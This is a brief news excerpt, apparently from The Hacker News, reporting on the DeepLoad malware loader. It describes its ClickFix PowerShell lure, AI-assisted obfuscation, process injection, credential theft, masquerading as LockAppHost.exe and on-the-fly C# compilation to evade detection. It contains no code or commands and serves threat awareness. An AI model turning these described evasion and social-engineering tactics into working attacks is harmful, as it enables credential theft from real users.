""It likely uses AI-assisted obfuscation and process injection to evade static scanning, while credential theft starts immediately and captures passwords and sessions even if the primary loader is blocked.""
""The starting point of the attack chain is a ClickFix lure that tricks users into running PowerShell commands by pasting the command into the Windows Run dialog under the pretext of addressing a non-existent issue.""
""DeepLoad makes deliberate efforts to blend in with regular Windows activity and fly under the radar, including hiding the payload within an executable named 'LockAppHost.exe.'""
""To evade file-based detection, DeepLoad generates a secondary component on the fly by using the built-in PowerShell feature Add-Type, which compiles and runs code written in C#.""
DeepLoad is a malware loader that employs ClickFix social engineering tactics to trick users into executing PowerShell commands. It utilizes AI-assisted obfuscation and process injection to avoid detection. The malware captures credentials and sessions right away, even if the primary loader is blocked. It disguises itself within legitimate Windows processes and disables command history to evade monitoring. Additionally, it generates a secondary component dynamically to bypass file-based detection, further enhancing its stealth capabilities.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]